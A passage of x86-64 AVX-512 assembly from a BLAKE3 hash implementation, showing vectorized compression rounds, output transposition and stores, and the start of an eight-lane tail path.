vpaddd zmm3,zmm3,zmm17
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm16
vpaddd zmm1,zmm1,zmm18
vpaddd zmm2,zmm2,zmm24
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm28
vpaddd zmm1,zmm1,zmm25
vpaddd zmm2,zmm2,zmm31
vpaddd zmm3,zmm3,zmm30
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm29
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm26
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm23
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm16
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm18
vpaddd zmm1,zmm1,zmm19
vpaddd zmm2,zmm2,zmm17
vpaddd zmm3,zmm3,zmm20
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm25
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm24
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm30
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm28
vpaddd zmm3,zmm3,zmm17
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm29
vpaddd zmm1,zmm1,zmm16
vpaddd zmm2,zmm2,zmm18
vpaddd zmm3,zmm3,zmm20
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm19
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm22
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm27
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm17
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm31
vpaddd zmm1,zmm1,zmm16
vpaddd zmm2,zmm2,zmm25
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm30
vpaddd zmm1,zmm1,zmm18
vpaddd zmm2,zmm2,zmm19
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm26
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm20
vpaddd zmm3,zmm3,zmm29
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpxord zmm0,zmm0,zmm8
vpxord zmm1,zmm1,zmm9
vpxord zmm2,zmm2,zmm10
vpxord zmm3,zmm3,zmm11
vpxord zmm4,zmm4,zmm12
vpxord zmm5,zmm5,zmm13
vpxord zmm6,zmm6,zmm14
vpxord zmm7,zmm7,zmm15
vpxord zmm8,zmm8,DWORD PTR [rdi]{1to16}
vpxord zmm9,zmm9,DWORD PTR [rdi+0x4]{1to16}
vpxord zmm10,zmm10,DWORD PTR [rdi+0x8]{1to16}
vpxord zmm11,zmm11,DWORD PTR [rdi+0xc]{1to16}
vpxord zmm12,zmm12,DWORD PTR [rdi+0x10]{1to16}
vpxord zmm13,zmm13,DWORD PTR [rdi+0x14]{1to16}
vpxord zmm14,zmm14,DWORD PTR [rdi+0x18]{1to16}
vpxord zmm15,zmm15,DWORD PTR [rdi+0x1c]{1to16}
vpunpckldq zmm16,zmm0,zmm1
vpunpckhdq zmm17,zmm0,zmm1
vpunpckldq zmm18,zmm2,zmm3
vpunpckhdq zmm19,zmm2,zmm3
vpunpckldq zmm20,zmm4,zmm5
vpunpckhdq zmm21,zmm4,zmm5
vpunpckldq zmm22,zmm6,zmm7
vpunpckhdq zmm23,zmm6,zmm7
vpunpckldq zmm24,zmm8,zmm9
vpunpckhdq zmm25,zmm8,zmm9
vpunpckldq zmm26,zmm10,zmm11
vpunpckhdq zmm27,zmm10,zmm11
vpunpckldq zmm28,zmm12,zmm13
vpunpckhdq zmm29,zmm12,zmm13
vpunpckldq zmm30,zmm14,zmm15
vpunpckhdq zmm31,zmm14,zmm15
vpunpcklqdq zmm0,zmm16,zmm18
vpunpckhqdq zmm1,zmm16,zmm18
vpunpcklqdq zmm2,zmm17,zmm19
vpunpckhqdq zmm3,zmm17,zmm19
vpunpcklqdq zmm4,zmm20,zmm22
vpunpckhqdq zmm5,zmm20,zmm22
vpunpcklqdq zmm6,zmm21,zmm23
vpunpckhqdq zmm7,zmm21,zmm23
vpunpcklqdq zmm8,zmm24,zmm26
vpunpckhqdq zmm9,zmm24,zmm26
vpunpcklqdq zmm10,zmm25,zmm27
vpunpckhqdq zmm11,zmm25,zmm27
vpunpcklqdq zmm12,zmm28,zmm30
vpunpckhqdq zmm13,zmm28,zmm30
vpunpcklqdq zmm14,zmm29,zmm31
vpunpckhqdq zmm15,zmm29,zmm31
vshufi32x4 zmm16,zmm0,zmm4,0x88
vshufi32x4 zmm17,zmm1,zmm5,0x88
vshufi32x4 zmm18,zmm2,zmm6,0x88
vshufi32x4 zmm19,zmm3,zmm7,0x88
vshufi32x4 zmm20,zmm0,zmm4,0xdd
vshufi32x4 zmm21,zmm1,zmm5,0xdd
vshufi32x4 zmm22,zmm2,zmm6,0xdd
vshufi32x4 zmm23,zmm3,zmm7,0xdd
vshufi32x4 zmm24,zmm8,zmm12,0x88
vshufi32x4 zmm25,zmm9,zmm13,0x88
vshufi32x4 zmm26,zmm10,zmm14,0x88
vshufi32x4 zmm27,zmm11,zmm15,0x88
vshufi32x4 zmm28,zmm8,zmm12,0xdd
vshufi32x4 zmm29,zmm9,zmm13,0xdd
vshufi32x4 zmm30,zmm10,zmm14,0xdd
vshufi32x4 zmm31,zmm11,zmm15,0xdd
vshufi32x4 zmm0,zmm16,zmm24,0x88
vshufi32x4 zmm1,zmm17,zmm25,0x88
vshufi32x4 zmm2,zmm18,zmm26,0x88
vshufi32x4 zmm3,zmm19,zmm27,0x88
vshufi32x4 zmm4,zmm20,zmm28,0x88
vshufi32x4 zmm5,zmm21,zmm29,0x88
vshufi32x4 zmm6,zmm22,zmm30,0x88
vshufi32x4 zmm7,zmm23,zmm31,0x88
vshufi32x4 zmm8,zmm16,zmm24,0xdd
vshufi32x4 zmm9,zmm17,zmm25,0xdd
vshufi32x4 zmm10,zmm18,zmm26,0xdd
vshufi32x4 zmm11,zmm19,zmm27,0xdd
vshufi32x4 zmm12,zmm20,zmm28,0xdd
vshufi32x4 zmm13,zmm21,zmm29,0xdd
vshufi32x4 zmm14,zmm22,zmm30,0xdd
vshufi32x4 zmm15,zmm23,zmm31,0xdd
vmovdqu32 ZMMWORD PTR [r9],zmm0
vmovdqu32 ZMMWORD PTR [r9+0x40],zmm1
vmovdqu32 ZMMWORD PTR [r9+0x80],zmm2
vmovdqu32 ZMMWORD PTR [r9+0xc0],zmm3
vmovdqu32 ZMMWORD PTR [r9+0x100],zmm4
vmovdqu32 ZMMWORD PTR [r9+0x140],zmm5
vmovdqu32 ZMMWORD PTR [r9+0x180],zmm6
vmovdqu32 ZMMWORD PTR [r9+0x1c0],zmm7
vmovdqu32 ZMMWORD PTR [r9+0x200],zmm8
vmovdqu32 ZMMWORD PTR [r9+0x240],zmm9
vmovdqu32 ZMMWORD PTR [r9+0x280],zmm10
vmovdqu32 ZMMWORD PTR [r9+0x2c0],zmm11
vmovdqu32 ZMMWORD PTR [r9+0x300],zmm12
vmovdqu32 ZMMWORD PTR [r9+0x340],zmm13
vmovdqu32 ZMMWORD PTR [r9+0x380],zmm14
vmovdqu32 ZMMWORD PTR [r9+0x3c0],zmm15
vmovdqa32 zmm0,ZMMWORD PTR [rsp]
vmovdqa32 zmm1,ZMMWORD PTR [rsp+0x40]
vpaddd zmm2,zmm0,DWORD PTR [ADD16+rip]{1to16}
vpcmpltud k1,zmm2,zmm0
vpaddd zmm1{k1},zmm1,DWORD PTR [ADD1+rip]{1to16}
vmovdqa32 ZMMWORD PTR [rsp],zmm2
vmovdqa32 ZMMWORD PTR [rsp+0x40],zmm1
add r9,0x400
sub r10,0x10
cmp r10,0x10
jae 3b
test r10,r10
jne 2f
9:
vzeroupper
mov rsp,rbp
pop rbp
ret
2:
test r10,0x8
je 2f
vpbroadcastd ymm16,DWORD PTR [rsi]
vpbroadcastd ymm17,DWORD PTR [rsi+0x4]
vpbroadcastd ymm18,DWORD PTR [rsi+0x8]
vpbroadcastd ymm19,DWORD PTR [rsi+0xc]
vpbroadcastd ymm20,DWORD PTR [rsi+0x10]
vpbroadcastd ymm21,DWORD PTR [rsi+0x14]
vpbroadcastd ymm22,DWORD PTR [rsi+0x18]
vpbroadcastd ymm23,DWORD PTR [rsi+0x1c]
vpbroadcastd ymm24,DWORD PTR [rsi+0x20]
vpbroadcastd ymm25,DWORD PTR [rsi+0x24]
vpbroadcastd ymm26,DWORD PTR [rsi+0x28]
vpbroadcastd ymm27,DWORD PTR [rsi+0x2c]
vpbroadcastd ymm28,DWORD PTR [rsi+0x30]
vpbroadcastd ymm29,DWORD PTR [rsi+0x34]
vpbroadcastd ymm30,DWORD PTR [rsi+0x38]
vpbroadcastd ymm31,DWORD PTR [rsi+0x3c]
vpbroadcastd ymm0,DWORD PTR [rdi]
vpbroadcastd ymm1,DWORD PTR [rdi+0x4]
vpbroadcastd ymm2,DWORD PTR [rdi+0x8]
vpbroadcastd ymm3,DWORD PTR [rdi+0xc]
vpbroadcastd ymm4,DWORD PTR [rdi+0x10]
vpbroadcastd ymm5,DWORD PTR [rdi+0x14]
vpbroadcastd ymm6,DWORD PTR [rdi+0x18]
vpbroadcastd ymm7,DWORD PTR [rdi+0x1c]
vpbroadcastd ymm8,DWORD PTR [BLAKE3_IV_0+rip]
vpbroadcastd ymm9,DWORD PTR [BLAKE3_IV_1+rip]
vpbroadcastd ymm10,DWORD PTR [BLAKE3_IV_2+rip]
vpbroadcastd ymm11,DWORD PTR [BLAKE3_IV_3+rip]
vmovdqa ymm12,YMMWORD PTR [rsp]
vmovdqa ymm13,YMMWORD PTR [rsp+0x40]
vpbroadcastd ymm14,edx
vpbroadcastd ymm15,r8d
vpaddd ymm0,ymm0,ymm16
vpaddd ymm1,ymm1,ymm18
vpaddd ymm2,ymm2,ymm20
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm17
vpaddd ymm1,ymm1,ymm19
vpaddd ymm2,ymm2,ymm21
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm24
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm28
vpaddd ymm3,ymm3,ymm30
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm25
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm29
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm18
vpaddd ymm1,ymm1,ymm19
vpaddd ymm2,ymm2,ymm23
vpaddd ymm3,ymm3,ymm20
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm22
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm16
vpaddd ymm3,ymm3,ymm29
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm17
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm25
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm27
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm30
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
